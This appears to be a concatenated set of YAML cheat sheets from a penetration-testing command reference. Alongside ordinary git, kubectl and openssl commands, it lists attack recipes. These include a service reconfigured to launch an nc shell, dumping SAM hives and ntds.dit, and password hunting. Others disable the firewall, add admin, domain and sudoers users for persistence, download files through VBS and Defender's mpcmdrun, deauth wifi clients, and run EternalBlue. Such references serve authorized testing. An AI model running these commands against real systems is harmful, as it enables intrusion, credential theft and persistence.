git merge --abort 103 | ``` 104 | 105 | Displays log of commits for a repo 106 | ``` 107 | git log 108 | ``` 109 | 110 | Displays formatted log of commits for a repo 111 | ``` 112 | git log --all --decorate --oneline --graph 113 | ``` 114 | 115 | Clear everything 116 | ``` 117 | git clean -dxf 118 | ``` 119 | 120 | Sign all commits in a branch based on master 121 | ``` 122 | git rebase master -S -f 123 | ``` 124 | 125 | Checkout a branch from a fork 126 | ``` 127 | git fetch origin pull//head:pr/ && git checkout pr/ 128 | ``` 129 | 130 | Add a new module 131 | ``` 132 | git submodule add 133 | ``` 134 | 135 | Update module 136 | ``` 137 | git submodule update --init 138 | ``` 139 | 140 | Update module without init 141 | ``` 142 | git submodule update 143 | ``` 144 | 145 | Pull all submodules 146 | ``` 147 | git submodule foreach git pull origin master 148 | ``` 149 | 150 | Update all submodules 151 | ``` 152 | git submodule update --init --recursive 153 | ``` 154 | 155 | Skip git hooks 156 | ``` 157 | git commit --no-verify 158 | ``` 159 | 160 | Create new branch from current HEAD 161 | ``` 162 | git checkout -b 163 | ``` 164 | 165 | pull remote branch and switch to it 166 | ``` 167 | git checkout -b / 168 | ``` 169 | 170 | git dump 171 | ``` 172 | gitdumper /.git/ 173 | ``` 174 | 175 | = remote: origin 176 | -------------------------------------------------------------------------------- /files/Tools/kubernetes.yaml: -------------------------------------------------------------------------------- 1 | name: kubernetes 2 | tags: [kubernetes, k8s, kubectl] 3 | data: | 4 | 5 | plateform/linux #target/local #cat/UTILS 6 | 7 | Print all contexts 8 | ``` 9 | kubectl config get-contexts 10 | ``` 11 | 12 | Print current context of kubeconfig 13 | ``` 14 | kubectl config current-context 15 | ``` 16 | 17 | Set context of kubeconfig 18 | ``` 19 | kubectl config use-context 20 | ``` 21 | 22 | Print resource documentation 23 | ``` 24 | kubectl explain 25 | ``` 26 | 27 | Get nodes (add option '-o wide' for details) 28 | ``` 29 | kubectl get nodes 30 | ``` 31 | 32 | Get namespaces 33 | ``` 34 | kubectl get namespaces 35 | ``` 36 | 37 | Get pods from namespace (add option '-o wide' for details) 38 | ``` 39 | kubectl get pods -n 40 | ``` 41 | 42 | Get pods from all namespace (add option '-o wide' for details) 43 | ``` 44 | kubectl get pods --all-namespaces 45 | ``` 46 | 47 | Get services from namespace 48 | ``` 49 | kubectl get services -n 50 | ``` 51 | 52 | Get details from resource on namespace 53 | ``` 54 | kubectl describe / -n 55 | ``` 56 | 57 | Print logs from namespace 58 | ``` 59 | kubectl logs -f pods/ -n 60 | ``` 61 | 62 | Get deployments 63 | ``` 64 | kubectl get deployments -n 65 | ``` 66 | 67 | Edit deployments 68 | ``` 69 | kubectl edit deployment/ -n 70 | ``` 71 | 72 | Drain node in preparation for maintenance 73 | ``` 74 | kubectl drain 75 | ``` 76 | 77 | Mark node as schedulable 78 | ``` 79 | kubectl uncordon 80 | ``` 81 | 82 | Mark node as unschedulable 83 | ``` 84 | kubectl cordon 85 | ``` 86 | 87 | Display resource (cpu/memory/storage) usage 88 | ``` 89 | kubectl top 90 | ``` -------------------------------------------------------------------------------- /files/Web/drupwn.yaml: -------------------------------------------------------------------------------- 1 | name: drupwn 2 | tags: [drupal, drupwn] 3 | data: | 4 | 5 | plateform/linux #target/remote #cat/RECON 6 | 7 | drupwn classic 8 | ``` 9 | drupwn --users --nodes --modules --dfiles --themes enum 10 | ``` 11 | 12 | drupwn, docker 13 | ``` 14 | sudo docker run --rm -it immunit/drupwn --users --nodes --modules --dfiles --themes enum 15 | ``` 16 | 17 | -------------------------------------------------------------------------------- /files/Web/fuzzer.yaml: -------------------------------------------------------------------------------- 1 | name: gobuster 2 | tags: [fuzzer, fuzz, gobuster] 3 | data: | 4 | 5 | plateform/linux #target/remote #cat/ATTACK/FUZZ 6 | gobuster scan classic 7 | ``` 8 | gobuster dir -u -w 9 | ``` 10 | 11 | gobuster scan pentest classic fuzz 12 | ``` 13 | gobuster dir -u -w -x json,html,php,txt,xml,md 14 | ``` 15 | 16 | gobuster scan high rate 17 | ``` 18 | gobuster dir -u -w -t 30 19 | ``` 20 | 21 | gobuster scan with adding extension 22 | ``` 23 | gobuster dir -u -w -x json,html,php,txt 24 | ``` 25 | 26 | wfuzz 27 | 28 | % fuzzer, fuzz, wfuzz 29 | plateform/linux #target/remote #cat/ATTACK/FUZZ 30 | wfuzz with number on url ( url : http://site/ ) 31 | ``` 32 | wfuzz -z range,1-1000 -u FUZZ 33 | ``` 34 | 35 | wfuzz with wordlist on url ( url : http://site/ ) 36 | ``` 37 | wfuzz -z file, -u FUZZ 38 | ``` 39 | 40 | wfuzz on post parameter 41 | ``` 42 | wfuzz -z file, -X post -u -d 'FUZZ=1' 43 | ``` 44 | 45 | Dirb 46 | 47 | % fuzzer, fuzz, dirb 48 | plateform/linux #target/remote #cat/ATTACK/FUZZ 49 | dirb commons 50 | ``` 51 | dirb -w /usr/share/wordlists/dirb/common.txt 52 | ``` 53 | 54 | ffuf 55 | 56 | % fuzzer, fuzz, ffuf 57 | plateform/linux #target/remote #cat/ATTACK/FUZZ 58 | ffuf fuzz keyword in url 59 | ``` 60 | ffuf -w -u /FUZZ 61 | ``` 62 | 63 | ffuf fuzz Host filter response size 64 | ``` 65 | ffuf -w -u -H "Host: FUZZ" -fs 66 | ``` 67 | 68 | ffuf GET parameter fuzzing 69 | ``` 70 | ffuf -w -u ?=FUZZ -fs 71 | ``` 72 | 73 | ffuf POST parameter fuzzing and filter response code 401 74 | ``` 75 | ffuf -w -u -X POST -d "username=admin\&password=FUZZ" -fc 401 76 | ``` 77 | 78 | = wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -------------------------------------------------------------------------------- /files/Web/jwttool.yaml: -------------------------------------------------------------------------------- 1 | name: JwtTool 2 | tags: [jwttool, token, jwt] 3 | data: | 4 | 5 | Jwt tool Mode all tests 6 | plateform/linux #target/remote #cat/RECON 7 | ``` 8 | python3 jwt_tool.py -M at -t "" -rh "Authorization: Bearer " -rh "" -rc "" 9 | ``` 10 | 11 | Jwt tool reuse query id 12 | plateform/linux #target/remote #cat/RECON 13 | ``` 14 | python3 jwt_tool.py -Q "" 15 | ``` 16 | 17 | Jwt tool bruteforce key 18 | plateform/linux #target/local #cat/RECON 19 | ``` 20 | python3 jwt_tool.py -d 21 | ``` 22 | 23 | -------------------------------------------------------------------------------- /files/Web/openssl.yaml: -------------------------------------------------------------------------------- 1 | name: openssl 2 | tags: [openssl, certificate, encryption] 3 | data: | 4 | 5 | plateform/linux #target/local #cat/UTILS 6 | 7 | Create a new signing request and key 8 | ``` 9 | openssl req -new -newkey rsa: -nodes -out -keyout 10 | ``` 11 | 12 | Create a new self-signed certificate 13 | ``` 14 | openssl req -x509 -sha256 -nodes -days -newkey rsa: -out -keyout 15 | ``` 16 | 17 | Create a signing request from existing key 18 | ``` 19 | openssl req -out -key -new 20 | ``` 21 | 22 | Create a signing request from existing certificate and key 23 | ``` 24 | openssl x509 -x509toreq -out -in -signkey 25 | ``` 26 | 27 | Remove a passphrase from a private key 28 | ``` 29 | openssl rsa -in -out 30 | ``` 31 | 32 | Convert a DER encoded file to a PEM encoded file 33 | ``` 34 | openssl x509 -inform der -in -out 35 | ``` 36 | 37 | Convert a PEM encoded file to a DER encoded file 38 | ``` 39 | openssl x509 -outform der -in -out 40 | ``` 41 | 42 | Convert a PKCS12 encoded file containing a private key and certificates to PEM 43 | ``` 44 | openssl pkcs12 -in -out -nodes 45 | ``` 46 | 47 | Extract the private key from a PKCS12 encoded file 48 | ``` 49 | openssl pkcs12 -in -out -nodes -nocerts 50 | ``` 51 | 52 | Extract the certificate from a PKCS12 encoded file 53 | ``` 54 | openssl pkcs12 -in -out -nodes -nokeys 55 | ``` 56 | 57 | Convert a PEM certificate file and a private key to PKCS12 encoded file 58 | ``` 59 | openssl pkcs12 -export -out -inkey -in -certfile 60 | ``` 61 | 62 | Validate a certificate signing request 63 | ``` 64 | openssl req -text -noout -verify -in 65 | ``` 66 | 67 | Validate a private key 68 | ``` 69 | openssl rsa -in -check 70 | ``` 71 | 72 | Validate a certificate 73 | ``` 74 | openssl x509 -in -text -noout 75 | ``` 76 | 77 | Validate a PKCS12 file (.pfx or .p12) 78 | ``` 79 | openssl pkcs12 -info -in 80 | ``` 81 | 82 | Compare the MD5 hash of a certificate 83 | ``` 84 | openssl x509 -noout -modulus -in | openssl md5 85 | ``` 86 | 87 | Compare the MD5 hash of a private key 88 | ``` 89 | openssl rsa -noout -modulus -in | openssl md5 90 | ``` 91 | 92 | Compare the MD5 hash of a certificate signing request 93 | ``` 94 | openssl req -noout -modulus -in | openssl md5 95 | ``` 96 | 97 | Display the server certificate chain 98 | ``` 99 | openssl s_client -connect : 100 | ``` -------------------------------------------------------------------------------- /files/Web/tomcat.yaml: -------------------------------------------------------------------------------- 1 | name: Tomcat 2 | tags: [tomcat] 3 | data: | 4 | 5 | tomcat manager bruteforce 6 | plateform/linux #target/remote #cat/ATTACK/BRUTEFORCE-SPRAY 7 | ``` 8 | msfconsole -x "use auxiliary/scanner/http/tomcat_enum" 9 | ``` 10 | 11 | tomcat deploy 12 | plateform/linux #target/remote #cat/ATTACK/EXPLOIT 13 | ``` 14 | msfconsole -x "use exploit/multi/http/tomcat_mgr_deploy" 15 | ``` 16 | -------------------------------------------------------------------------------- /files/Web/web.yaml: -------------------------------------------------------------------------------- 1 | name: WEB 2 | tags: [web] 3 | data: | 4 | 5 | extract links from an url 6 | plateform/linux #target/remote #cat/RECON 7 | ``` 8 | curl -k -s | grep -o 'http://[^"]*' | cut -d "/" -f 3 | sort -u 9 | ``` 10 | -------------------------------------------------------------------------------- /files/Web/wpscan.yaml: -------------------------------------------------------------------------------- 1 | name: WPSCAN 2 | tags: [wpscan, wordpress] 3 | data: | 4 | 5 | plateform/linux #target/remote #cat/RECON 6 | wpscan with docker and burp proxy 7 | ``` 8 | sudo docker run -it --network host --rm wpscanteam/wpscan --proxy http://127.0.0.1:8080 --url --disable-tls-checks -e ap,tt,cb,dbe,u1-20,m --api-token 9 | ``` 10 | -------------------------------------------------------------------------------- /files/Wifi/wifi.yaml: -------------------------------------------------------------------------------- 1 | name: wifi 2 | tags: [wifi] 3 | data: | 4 | 5 | airmon - start interface 6 | ``` 7 | airmon-ng start wlan0 8 | ``` 9 | 10 | airodump - listen to everything 11 | ``` 12 | airodump-ng wlan0mon 13 | ``` 14 | 15 | airodump - listen to specific SSID 16 | ``` 17 | airodump-ng --bssid -c -w wlan0mon 18 | ``` 19 | 20 | aireplay - deauth clients 21 | ``` 22 | aireplay-ng --deauth 5 -c -a wlan0mon 23 | ``` 24 | 25 | aircrack - crack handshake for PSK 26 | ``` 27 | aircrack-ng -w 28 | ``` 29 | 30 | hostapd-wpe - launch fake AP 31 | ``` 32 | hostapd-wpe /etc/hostapd-wpe/hostapd-wpe.conf 33 | ``` -------------------------------------------------------------------------------- /files/Windows/forfiles.yaml: -------------------------------------------------------------------------------- 1 | name: forfiles 2 | tags: [forfiles,forfile,for] 3 | data: | 4 | 5 | @FILE 文件名。 6 | @FNAME 不带扩展名的文件名。 7 | @EXT 文件扩展名。 8 | @PATH 文件的完整路径。 9 | @RELPATH 文件的相对路径。 10 | @ISDIR 如果文件类型为目录,则计算结果为 TRUE。 否则,此变量的计算结果为 FALSE。 11 | @FSIZE 文件大小(以字节为单位)。 12 | @FDATE 文件中上次修改的日期戳。 13 | @FTIME 文件中上次修改的时间戳。 14 | 15 | # 列出驱动器D上的某个文件所在绝对路径 16 | 17 | forfiles /P D:\ /S /M logo.png /C "cmd /c echo @path" 18 | 19 | # 列出驱动器 C 上的所有批处理文件 20 | 21 | forfiles /P c:\ /S /M *.bat /C "cmd /c echo @file is a batch file" 22 | 23 | # 列出驱动器 C 上的所有目录 24 | 25 | forfiles /P c:\ /S /M * /C "cmd /c if @isdir==TRUE echo @file is a directory" 26 | 27 | # 列出当前目录中早于2007年1月1日的每个文件 28 | 29 | forfiles /S /M *.* /D -01/01/2007 /C "cmd /c echo @file is outdated." 30 | 31 | -------------------------------------------------------------------------------- /files/Windows/netsh.yaml: -------------------------------------------------------------------------------- 1 | name: netsh 2 | tags: [netsh,net] 3 | data: | 4 | 5 | # 自Windows XP开始,Windows中就内置网络端口转发的功能。任何传入到本地端口的TCP连接(IPv4或IPv6)都可以被重定向到另一个本地端口,或远程计算机上的端口,并且系统不需要有一个专门用于侦听该端口的服务。 6 | 7 | Netsh interface portproxy add v4tov4 listenport=7772 connectaddress=192.168.174.129 connectport=8065 8 | 9 | netsh interface portproxy add v4tov4 listenaddress=localaddress listenport=localport connectaddress=destaddress connectport=destport 10 | 11 | - listenaddress - 等待连接的本地IP地址。 12 | - listenport - 本地侦听TCP端口。 13 | - connectaddress - 将传入连接重定向到本地或远程IP地址(或DNS名称)。 14 | 15 | # 重要:请确保防火墙(Windows防火墙或通常包含在杀毒软件中的第三方防火墙)允许到新端口的传入连接。 如有必要,可以使用以下命令添加新的Windows防火墙规则: 16 | 17 | 18 | netsh advfirewall firewall add rule name=”forwarded_RDPport_3340” protocol=TCP dir=in localip=10.1.1.110 localport=3340 action=allow 19 | 20 | # 显示系统中的转发规则列表: 21 | 22 | netsh interface portproxy show all 23 | 24 | # 删除指定的端口转发规则: 25 | 26 | netsh interface portproxy delete v4tov4 listenport=3340 listenaddress=10.1.1.110 27 | 28 | # 除所有当前的端口转发规则: 29 | 30 | netsh interface portproxy reset 31 | -------------------------------------------------------------------------------- /files/Windows/openrdp.yaml: -------------------------------------------------------------------------------- 1 | name: openrdp 2 | tags: [openrdp,rdp] 3 | data: | 4 | 5 | # 注册表 6 | 7 | REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f 8 | 9 | # WMIC 10 | 11 | wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1 12 | 13 | # Win2008 Open 3389 14 | 15 | WMIc /namespace:\root\cimv2\terminalservices path win32_terminalservicesetting where (__CLASS != "") call setallowtsconnections 1 16 | 17 | WMIc /namespace:\root\cimv2\terminalservices path win32_tsgeneralsetting where (TerminalName ='RDP-Tcp') call setuserauthenticationrequired 1 18 | 19 | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fSingleSessionPerUser /t REG_DWORD /d 0 /f 20 | 21 | # 远程打开计算机远程桌面 22 | 23 | wmic /node:%pcname% /USER:%pcaccount% PATH win32_terminalservicesetting WHERE (__Class!="") CALL SetAllowTSConnections 1 24 | 25 | wmic /namespace:\\root\CIMV2\TerminalServices PATH Win32_TerminalServiceSetting WHERE (__CLASS !="") CALL 26 | 27 | # Winxp/7 Open 3389 28 | 29 | WMIc /namespace:\root\cimv2\terminalservices path win32_terminalservicesetting where (__CLASS != "") call setallowtsconnections 1 30 | -------------------------------------------------------------------------------- /files/Windows/powercfg.yaml: -------------------------------------------------------------------------------- 1 | name: powercfg 2 | tags: [power,powercfg] 3 | data: | 4 | 5 | # 关闭计算机休眠模式 6 | 7 | powercfg -h off 8 | -------------------------------------------------------------------------------- /files/Windows/powershell.yaml: -------------------------------------------------------------------------------- 1 | name: powershell 2 | tags: [powershell] 3 | data: | 4 | 5 | Get file in trash 6 | ``` 7 | Get-ADObject -filter 'isDeleted -eq $true -and name -ne "Deleted Objects"' -includeDeletedObjects -property * 8 | ``` 9 | 10 | Get process 11 | ``` 12 | Get-Process 13 | ``` 14 | -------------------------------------------------------------------------------- /files/Windows/schtasks.yaml: -------------------------------------------------------------------------------- 1 | name: schtasks 2 | tags: [schtasks,sch] 3 | data: | 4 | 5 | # 创建任务计划 - 每20分钟运行一次 6 | # 下面的命令计划C:\Windows\program.exe每 20 分钟运行一次。由于命令没有包含起始日期或时间,任务在命令完成 20 分钟后启动,此后每当系统运行它就每 20 分钟运行一次。 7 | 8 | schtasks /create /sc minute /mo 20 /tn "Security scrīpt" /tr C:\Windows\program.exe 9 | 10 | # 在指定时间执行 11 | # 下面的命令计划C:\Windows\program.exe在02点17分以SYSTEM权限执行一次。 12 | 13 | schtasks /create /sc once /st 02:17 /tn Program /tr "C:\Windows\program.exe" /ru system 14 | 15 | # 每小时过五分的时候运行 16 | # 下面的命令将计划 MyApp 程序从午夜过后五分钟起每小时运行一次。因为忽略了/mo参数,命令使用了小时计划的默认值,即每 (1) 小时。如果该命令在 12:05 A.M 之后生成,程序将在第二天才会运行。 17 | 18 | schtasks /create /sc hourly /st 00:05:00 /tn "My App" /tr C:\Windows\program.exe 19 | 20 | # 计划命令每五小时运行一次 21 | # 下面的命令计划 MyApp 程序从 2001 年 3 月的第一天起每五小时运行一次。它使用/mo参数来指定间隔时间,使用/sd参数来指定起始日期。由于命令没有指定起始时间,当前时间被用作起始时间。 22 | 23 | schtasks /create /sc hourly /mo 5 /sd 03/01/2001 /tn "My App" /tr c:\apps\myapp.exe 24 | 25 | # 查询指定任务计划 26 | 27 | schtasks /query /tn "\Microsoft\Windows\AppID\VerifiedPublisherCertStoreCheck" /FO LIST /V 28 | 29 | # 删除计划任务 30 | 31 | schtasks /delete /tn "My App" 32 | 33 | # 禁用计划任务 34 | 35 | schtasks /change /tn "My App" /disable 36 | 37 | # 无法加载列资源可以通过chcp 65001 ,改变页面编码解决 38 | -------------------------------------------------------------------------------- /files/Windows/tasklist.yaml: -------------------------------------------------------------------------------- 1 | name: tasklist 2 | tags: [tasklist,task] 3 | data: | 4 | 5 | 6 | # 列出当前正在运行的系统进程 7 | 8 | tasklist /fi "USERNAME ne NT AUTHORITY\SYSTEM" /fi "STATUS eq running" 9 | 10 | # 进程 ID 大于 1000 的所有任务并将其显示为 csv 格式 11 | 12 | tasklist /v /fi "PID gt 1000" /fo csv 13 | 14 | # 列出lsass.exe的 PID 15 | 16 | tasklist /fi "IMAGENAME eq lsass.exe" /fo list 17 | 18 | # 列出远程计算机上的进程列表 19 | 20 | tasklist /s /u Domain\user /p P@ssw0rd 21 | 22 | 23 | 24 | /fo {table | list | csv} 指定要用于输出的格式。 有效值为 table、 list 和 csv。 输出的默认格式为 table。 25 | /fi 筛选器表达式 26 | 27 | 筛选器名称 有效的运算符 有效值 (s) 28 | STATUS eq、ne RUNNING | NOT RESPONDING | UNKNOWN. 如果指定远程系统,则不支持此筛选器。 29 | IMAGENAME eq、ne 映像名称 30 | PID eq、ne、gt、lt、ge、le PID 值 31 | SESSION eq、ne、gt、lt、ge、le 会话号 32 | SESSIONNAME eq、ne “会话名称” 33 | CPUtime eq、ne、gt、lt、ge、le 采用 HH: MM: SS 格式的 CPU 时间,其中 MM 和 SS 介于0到59之间, HH 是任意无符号数字 34 | MEMUSAGE eq、ne、gt、lt、ge、le 内存使用量(KB) 35 | USERNAME eq、ne 任何有效用户名 () 36 | SERVICES eq、ne 服务名称 37 | WINDOWTITLE eq、ne 窗口标题。 如果指定远程系统,则不支持此筛选器。 38 | MODULES eq、ne DLL 名称 39 | 40 | -------------------------------------------------------------------------------- /files/Windows/tscon.yaml: -------------------------------------------------------------------------------- 1 | name: tscon 2 | tags: [tscon,con] 3 | data: | 4 | 5 | # 切换远程桌面会话 6 | 7 | tscon { | } [/dest:] [/password: | /password:*] [/v] 8 | 9 | # 切换Session ID 为 2 的桌面会话 10 | 11 | tscon 2 12 | 13 | # 切换到Session ID 为 2 的桌面会话,并传入凭据 14 | 15 | tscon 2 /password:mypass 16 | -------------------------------------------------------------------------------- /files/Windows/tskill.yaml: -------------------------------------------------------------------------------- 1 | name: tskill 2 | tags: [tskill,kill] 3 | data: | 4 | 5 | # 切换远程桌面会话 6 | 7 | tskill { | } [/server:] [/id: | /a] [/v] 8 | 9 | # 结束PID为6543的进程 10 | 11 | tskill 6543 12 | 13 | # 结束进程名为Name.exe的进程 14 | 15 | tskill Name.exe 16 | -------------------------------------------------------------------------------- /files/Windows/useradd.yaml: -------------------------------------------------------------------------------- 1 | name: useradd 2 | tags: [useradd,adduser,linux] 3 | data: | 4 | 5 | # 添加root用户 6 | 7 | useradd abc && echo "123456" | passwd --stdin abc 8 | 9 | usermod -g root abc 10 | 11 | chmod 0440 /etc/sudoers 12 | 13 | echo "abc ALL=(ALL:ALL) ALL" >> /etc/sudoers 14 | 15 | -------------------------------------------------------------------------------- /files/Windows/windows.yaml: -------------------------------------------------------------------------------- 1 | name: windows 2 | tags: [windows] 3 | data: | 4 | 5 | get info system 6 | ``` 7 | systeminfo 8 | ``` 9 | 10 | get info system limited 11 | ``` 12 | systeminfo | findstr /B /C:"OS Name" /C:"OS Version" 13 | ``` 14 | 15 | find passwords 16 | ``` 17 | findstr /si 'password' *.txt *.xml *.docx 18 | ``` 19 | 20 | find passwords - group policy preference (ms14-025) 21 | ``` 22 | findstr /S /I cpassword \\\sysvol\\policies\*.xml 23 | ``` 24 | 25 | get patchs 26 | ``` 27 | wmic qfe get Caption,Description,HotFixID,InstalledOn 28 | ``` 29 | 30 | get hostname 31 | ``` 32 | hostname 33 | ``` 34 | 35 | show environment - List all environment variables 36 | ``` 37 | set 38 | ``` 39 | 40 | dns request for DC 41 | ``` 42 | nslookup -type=any . 43 | ``` 44 | 45 | show mounted disks 46 | ``` 47 | wmic logicaldisk get caption,description,providername 48 | ``` 49 | 50 | show recyle bin 51 | ``` 52 | dir C:\$Recycle.Bin /s /b 53 | ``` 54 | 55 | get architecture 56 | ``` 57 | wmic os get osarchitecture || echo %PROCESSOR_ARCHITECTURE% 58 | ``` 59 | 60 | list scheduled tasks 61 | ``` 62 | schtasks /query /fo LIST /v 63 | ``` 64 | 65 | list one scheduled task 66 | ``` 67 | schtasks /query /fo LIST 2>nul | findstr 68 | ``` 69 | 70 | list process 71 | ``` 72 | tasklist /V 73 | ``` 74 | 75 | list process and links to started services 76 | ``` 77 | tasklist /SVC 78 | ``` 79 | 80 | list windows service started (1) 81 | ``` 82 | net start 83 | ``` 84 | 85 | list services (2) 86 | ``` 87 | wmic service list brief 88 | ``` 89 | 90 | list services (3) 91 | ``` 92 | sc query List of services 93 | ``` 94 | 95 | list installed software (1) 96 | ``` 97 | dir /a "C:\Program Files" 98 | ``` 99 | 100 | list installed software (2) 101 | ``` 102 | dir /a "C:\Program Files (x86)" 103 | ``` 104 | 105 | list installed software (3) 106 | ``` 107 | reg query HKEY_LOCAL_MACHINE\SOFTWARE 108 | ``` 109 | 110 | register query word password (1) 111 | ``` 112 | reg query HKLM /f password /t REG_SZ /s 113 | ``` 114 | 115 | register query word password (2) 116 | ``` 117 | reg query HKCU /f password /t REG_SZ /s 118 | ``` 119 | 120 | register query extract same 121 | 122 | When the Windows operating system is running, the hives are in use and mounted. The command-line tool named reg can be used to export them. 123 | 124 | ``` 125 | reg save HKLM\SAM 'C:\Windows\Temp\sam.save' 126 | reg save HKLM\SECURITY 'C:\Windows\Temp\security.save' 127 | reg save HKLM\SYSTEM 'C:\Windows\Temp\system.save' 128 | ``` 129 | 130 | check service privilege 131 | ``` 132 | accesschk.exe /accepteula -ucqv 133 | ``` 134 | 135 | reconfigure service 136 | ``` 137 | sc config binpath= "C:\nc.exe -nv 127.0.0.1 4444 -e C:\WINDOWS\System32\cmd.exe" 138 | ``` 139 | 140 | change service 141 | ``` 142 | sc config obj= ".\LocalSystem" password= "" 143 | ``` 144 | 145 | start service 146 | ``` 147 | net start 148 | ``` 149 | 150 | check permission (1) 151 | ``` 152 | accesschk.exe /accepteula -dqv "" 153 | ``` 154 | 155 | check permission (2) 156 | ``` 157 | cacls "" 158 | ``` 159 | 160 | find weak folder permission 161 | ``` 162 | accesschk.exe -uwdqs Users :\ 163 | ``` 164 | 165 | find weak file permission 166 | ``` 167 | accesschk.exe -uwqs Users :\ 168 | ``` 169 | 170 | % windows, download 171 | 172 | VBS download file script 173 | cat/ATTACK/FILE_TRANSFERT 174 | ``` 175 | echo var WinHttpReq = new ActiveXObject("WinHttp.WinHttpRequest.5.1");WinHttpReq.Open("GET", WScript.Arguments(0), /*async=*/false);WinHttpReq.Send();WScript.Echo(WinHttpReq.ResponseText); > fu.js && cscript /nologo fu.js > 176 | ``` 177 | 178 | % windows, users 179 | 180 | add user 181 | cat/PERSIST 182 | ``` 183 | net user /ADD 184 | ``` 185 | 186 | add user to domain 187 | cat/PERSIST 188 | ``` 189 | net user /ADD /DOMAIN 190 | ``` 191 | 192 | add user as admin 193 | cat/PERSIST 194 | ``` 195 | net localgroup administrators /add 196 | ``` 197 | 198 | run as over user 199 | cat/PRIVESC 200 | ``` 201 | runas /user:\ cmd.exe 202 | ``` 203 | 204 | whoami - All info about me, take a look at the enabled tokens 205 | cat/PRIVESC 206 | ``` 207 | whoami /all 208 | ``` 209 | 210 | whoami privilegied 211 | cat/PRIVESC 212 | ``` 213 | whoami /priv Show only privileges 214 | ``` 215 | 216 | list all users 217 | cat/PRIVESC 218 | ``` 219 | net users 220 | ``` 221 | 222 | list domain admins (fr) 223 | plateform/windows #target/local #cat/RECON 224 | ``` 225 | net group "Admins du domaine" 226 | ``` 227 | 228 | infos about a user 229 | cat/RECON 230 | ``` 231 | net user 232 | ``` 233 | 234 | infos about password policy 235 | cat/RECON 236 | ``` 237 | net accounts 238 | ``` 239 | 240 | who logged in 241 | cat/PRIVESC 242 | ``` 243 | qwinsta 244 | ``` 245 | 246 | List credentials 247 | cat/POSTEXPLOIT/CREDS_RECOVER 248 | ``` 249 | cmdkey /list 250 | ``` 251 | 252 | show local groups 253 | cat/RECON 254 | ``` 255 | net localgroup 256 | ``` 257 | 258 | show specific local group 259 | ``` 260 | net localgroup 261 | ``` 262 | 263 | show domain groups 264 | ``` 265 | net group /domain 266 | ``` 267 | 268 | show domain group users 269 | ``` 270 | net group /domain 271 | ``` 272 | 273 | % windows, domain infos 274 | 275 | get domain name 276 | ``` 277 | echo %USERDOMAIN% 278 | ``` 279 | 280 | get domain name (2) 281 | ``` 282 | echo %USERDNSDOMAIN% 283 | ``` 284 | 285 | get computer domain name (3) 286 | ``` 287 | systeminfo | findstr /B /C:"Domain" 288 | ``` 289 | 290 | get name of the DC 291 | ``` 292 | echo %logonserver% 293 | ``` 294 | 295 | get name of the dc (2) 296 | ``` 297 | set logonserver Get name of the domain controller 298 | ``` 299 | 300 | list of domain groups 301 | ``` 302 | net groups /domain 303 | ``` 304 | 305 | list of computer connected to the domain 306 | ``` 307 | net group "domain computers" /domain 308 | ``` 309 | 310 | List all PCs of the domain 311 | ``` 312 | net view /domain 313 | ``` 314 | 315 | # list domain controllers 316 | ``` 317 | nltest /dclist: 318 | ``` 319 | 320 | list pc accounts of domain controllers 321 | ``` 322 | net group "Domain Controllers" /domain 323 | ``` 324 | 325 | List users with domain admin privileges 326 | ``` 327 | net group "Domain Admins" /domain 328 | ``` 329 | 330 | List users that belongs to the administrators group inside the domain 331 | ``` 332 | net localgroup administrators /domain 333 | ``` 334 | 335 | List all domain users 336 | ``` 337 | net user /domain 338 | ``` 339 | 340 | get user domain information 341 | ``` 342 | net user /domain 343 | ``` 344 | 345 | domain password and lockout policy 346 | ``` 347 | net accounts /domain 348 | ``` 349 | 350 | get mapping of the trust relationships 351 | ``` 352 | nltest /domain_trust 353 | ``` 354 | 355 | % windows, network 356 | all interfaces 357 | ``` 358 | ipconfig /all 359 | ``` 360 | 361 | print all routes 362 | ``` 363 | route print 364 | ``` 365 | 366 | list of know hosts 367 | ``` 368 | arp -a 369 | ``` 370 | 371 | # list open ports 372 | ``` 373 | netstat -ano 374 | ``` 375 | 376 | show hosts file 377 | ``` 378 | type C:\WINDOWS\System32\drivers\etc\hosts 379 | ``` 380 | 381 | % windows, dir 382 | 383 | list hidden files 384 | ``` 385 | dir /a:h 386 | ``` 387 | 388 | Recursive list 389 | ``` 390 | dir /s /b 391 | ``` 392 | 393 | % windows, firewall 394 | show firewall state 395 | ``` 396 | netsh firewall show state 397 | ``` 398 | 399 | show firewall config 400 | ``` 401 | netsh firewall show config 402 | ``` 403 | 404 | turn off firewall 405 | ``` 406 | NetSh Advfirewall set allprofiles state off 407 | ``` 408 | 409 | turn off firewall (2) 410 | ``` 411 | netsh firewall set opmode disable 412 | ``` 413 | 414 | turn on firewall 415 | ``` 416 | NetSh Advfirewall set allprofiles state on 417 | ``` 418 | 419 | firewall open port RDP 420 | ``` 421 | netsh firewall add portopening TCP 3389 "Remote Desktop" 422 | ``` 423 | 424 | % windows, ntds.dit 425 | dump ntds.dit 426 | ``` 427 | ntdsutil "ac i ntds" "ifm" "create full c:\temp" q q 428 | ``` 429 | 430 | % windows, smb, share 431 | list of computer 432 | ``` 433 | net view 434 | ``` 435 | 436 | list of computer shares on the domain 437 | ``` 438 | net view /all /domain 439 | ``` 440 | 441 | list share of a computer 442 | ``` 443 | net view \\ \ALL 444 | ``` 445 | 446 | mount share locally 447 | ``` 448 | net use x: \\\ 449 | ``` 450 | 451 | check current share 452 | ``` 453 | net share 454 | ``` 455 | 456 | % windows, file, download 457 | windows download file with windows defender 458 | ``` 459 | "c:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\mpcmdrun.exe" -DownloadFile -url -path 460 | ``` 461 | 462 | windows download file with windows defender 463 | ``` 464 | mpcmdrun.exe -DownloadFile -url -path 465 | ``` 466 | 467 | % windows, active directory, dns 468 | 469 | find AD IP - show domain name and dns 470 | ``` 471 | nmcli dev show 472 | ``` 473 | 474 | nslookup AD - domain 475 | ``` 476 | nslookup -type=SRV _ldap._tcp.dc._msdcs. 477 | ``` 478 | 479 | % windows, cve 480 | windows eternal blue - smb - ms17-010 481 | ``` 482 | msfconsole -x "use exploit/windows/smb/ms17_010_eternalblue" 483 | ``` 484 | 485 | = interface: eth0 486 | -------------------------------------------------------------------------------- /files/Windows/wmic.yaml: -------------------------------------------------------------------------------- 1 | name: wmic 2 | tags: [wmic,wmi] 3 | data: | 4 | 5 